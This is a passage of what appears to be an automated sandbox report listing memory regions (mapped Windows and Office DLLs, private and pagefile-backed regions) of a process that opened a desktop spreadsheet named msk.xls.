region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 640
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 641
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 642
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 643
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 644
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 645
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 646
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 647
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 648
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 649
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 650
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 651
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 652
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 653
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 654
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 655
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 656
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 657
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 658
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 659
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 660
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 661
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 662
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 663
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 664
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 665
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 666
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 667
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 668
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 669
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 670
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 671
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 672
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 673
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 674
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 675
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 676
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 677
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 678
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 679
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 680
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 681
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 682
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 683
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 684
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 685
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 686
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 687
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 688
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 689
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 690
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 691
start_va = 0x70650000
end_va = 0x719a5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imageres.dll"
filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll")
Region:
id = 692
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imageres.dll.mui"
filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui")
Region:
id = 693
start_va = 0x8dd0000
end_va = 0x8dd1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "networkexplorer.dll.mui"
filename = "\\Windows\\System32\\en-US\\NetworkExplorer.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\networkexplorer.dll.mui")
Region:
id = 694
start_va = 0x7fef4d50000
end_va = 0x7fef4dc2fff
monitored = 0
entry_point = 0x7fef4dac7f8
region_type = mapped_file
name = "ieproxy.dll"
filename = "\\Program Files\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll")
Region:
id = 695
start_va = 0x8de0000
end_va = 0x8deffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008de0000"
filename = ""
Region:
id = 696
start_va = 0x70650000
end_va = 0x719a5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imageres.dll"
filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll")
Region:
id = 697
start_va = 0x8df0000
end_va = 0x8df0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imageres.dll.mui"
filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui")
Region:
id = 698
start_va = 0x7fef7650000
end_va = 0x7fef773dfff
monitored = 0
entry_point = 0x7fef76512a0
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")
Region:
id = 699
start_va = 0x8df0000
end_va = 0x8df0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008df0000"
filename = ""
Region:
id = 700
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 701
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 702
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 703
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 704
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 705
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 706
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 707
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 708
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 709
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 710
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 711
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 712
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 713
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 714
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 715
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 716
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 717
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 718
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 719
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 720
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 721
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 722
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 723
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 724
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 725
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 726
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 727
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 728
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 729
start_va = 0x8e00000
end_va = 0x8e00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e00000"
filename = ""
Region:
id = 730
start_va = 0x8e00000
end_va = 0x8e01fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e00000"
filename = ""
Region:
id = 731
start_va = 0x8e10000
end_va = 0x8e18fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e10000"
filename = ""
Region:
id = 732
start_va = 0x8e20000
end_va = 0x8e22fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e20000"
filename = ""
Region:
id = 733
start_va = 0x8e30000
end_va = 0x8e32fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e30000"
filename = ""
Region:
id = 734
start_va = 0xac00000
end_va = 0xacfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000ac00000"
filename = ""
Region:
id = 735
start_va = 0x7fffff62000
end_va = 0x7fffff63fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff62000"
filename = ""
Region:
id = 736
start_va = 0x9260000
end_va = 0x92b5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "shellstyle.dll"
filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll")
Region:
id = 737
start_va = 0x9260000
end_va = 0x92b5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "shellstyle.dll"
filename = "\\Windows\\Resources\\Themes\\Aero\\Shell\\NormalColor\\shellstyle.dll" (normalized: "c:\\windows\\resources\\themes\\aero\\shell\\normalcolor\\shellstyle.dll")
Region:
id = 738
start_va = 0x8e40000
end_va = 0x8e40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e40000"
filename = ""
Region:
id = 739
start_va = 0x8e40000
end_va = 0x8e40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e40000"
filename = ""
Region:
id = 740
start_va = 0x8e40000
end_va = 0x8e40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e40000"
filename = ""
Region:
id = 741
start_va = 0x8e40000
end_va = 0x8e40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e40000"
filename = ""
Region:
id = 742
start_va = 0x8e40000
end_va = 0x8e40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e40000"
filename = ""
Region:
id = 743
start_va = 0x7fef9280000
end_va = 0x7fef92bafff
monitored = 0
entry_point = 0x7fef92822f0
region_type = mapped_file
name = "winmm.dll"
filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll")
Region:
id = 744
start_va = 0x8e40000
end_va = 0x8e41fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e40000"
filename = ""
Region:
id = 745
start_va = 0x8e50000
end_va = 0x8e50fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e50000"
filename = ""
Region:
id = 746
start_va = 0xb730000
end_va = 0xb82ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b730000"
filename = ""
Region:
id = 747
start_va = 0x7fffff5e000
end_va = 0x7fffff5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5e000"
filename = ""
Region:
id = 748
start_va = 0x8e50000
end_va = 0x8e50fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e50000"
filename = ""
Region:
id = 749
start_va = 0x8e50000
end_va = 0x8e50fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000008e50000"
filename = ""
Region:
id = 750
start_va = 0xa510000
end_va = 0xa610fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a510000"
filename = ""
Region:
id = 751
start_va = 0xa510000
end_va = 0xa610fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a510000"
filename = ""
Region:
id = 752
start_va = 0xa510000
end_va = 0xa610fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a510000"
filename = ""
Region:
id = 753
start_va = 0xa510000
end_va = 0xa610fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a510000"
filename = ""
Region:
id = 754
start_va = 0xa510000
end_va = 0xa610fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a510000"
filename = ""
Region:
id = 755
start_va = 0x7fefb1b0000
end_va = 0x7fefb1c7fff
monitored = 0
entry_point = 0x7fefb1b1010
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 756
start_va = 0xb490000
end_va = 0xc48ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000000b490000"
filename = ""
Region:
id = 757
start_va = 0xc490000
end_va = 0xcad2fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "msk.xls3f5401265b8fe4bb0c8a645914b45b850a13dfaa5ec313ec8e108b2c5xls14b45b850a13dfaa5ec313ec8e108b2c5xls"
filename = "\\Users\\kEecfMwgj\\Desktop\\msk.xls3f5401265b8fe4bb0c8a645914b45b850a13dfaa5ec313ec8e108b2c5xls14b45b850a13dfaa5ec313ec8e108b2c5xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\msk.xls3f5401265b8fe4bb0c8a645914b45b850a13dfaa5ec313ec8e108b2c5xls14b45b850a13dfaa5ec313ec8e108b2c5xls")
Region:
id = 758
start_va = 0x3b30000
end_va = 0x3b30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003b30000"
filename = ""
Region:
id = 759
start_va = 0xc490000
end_va = 0xcad2fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "msk.xls"
filename = "\\Users\\kEecfMwgj\\Desktop\\msk.xls" (normalized: "c:\\users\\keecfmwgj\\desktop\\msk.xls")
Region:
id = 760
start_va = 0xa510000
end_va = 0xa5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a510000"
filename = ""
Region:
id = 761
start_va = 0xad00000
end_va = 0xae3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000ad00000"
filename = ""
Region:
id = 762
start_va = 0x7fef4c50000
end_va = 0x7fef4c75fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "alrtintl.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\alrtintl.dll")
Region:
id = 763
start_va = 0x7fef4c20000
end_va = 0x7fef4c45fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "alrtintl.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\alrtintl.dll")
Region:
id = 764
start_va = 0x4ba0000
end_va = 0x4bc5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "alrtintl.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\alrtintl.dll")
Region:
id = 765
start_va = 0xc490000
end_va = 0xd7e4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imageres.dll"
filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll")
Region:
id = 766
start_va = 0x3b40000
end_va = 0x3b40fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imageres.dll.mui"
filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui")
Region:
id = 767
start_va = 0x3b90000
end_va = 0x3b90fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b90000"
filename = ""
Region:
id = 768
start_va = 0xd7f0000
end_va = 0xdcc4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000d7f0000"
filename = ""
Region:
id = 769
start_va = 0x3b50000
end_va = 0x3b51fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b50000"
filename = ""
Region:
id = 770
start_va = 0x41b0000
end_va = 0x41b1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000041b0000"
filename = ""
Region:
id = 771
start_va = 0x41d0000
end_va = 0x41d2fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000041d0000"
filename = ""
Region:
id = 772
start_va = 0x4ae0000
end_va = 0x4ae1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ae0000"
filename = ""
Region:
id = 773
start_va = 0x4b00000
end_va = 0x4b01fff
monitored = 1
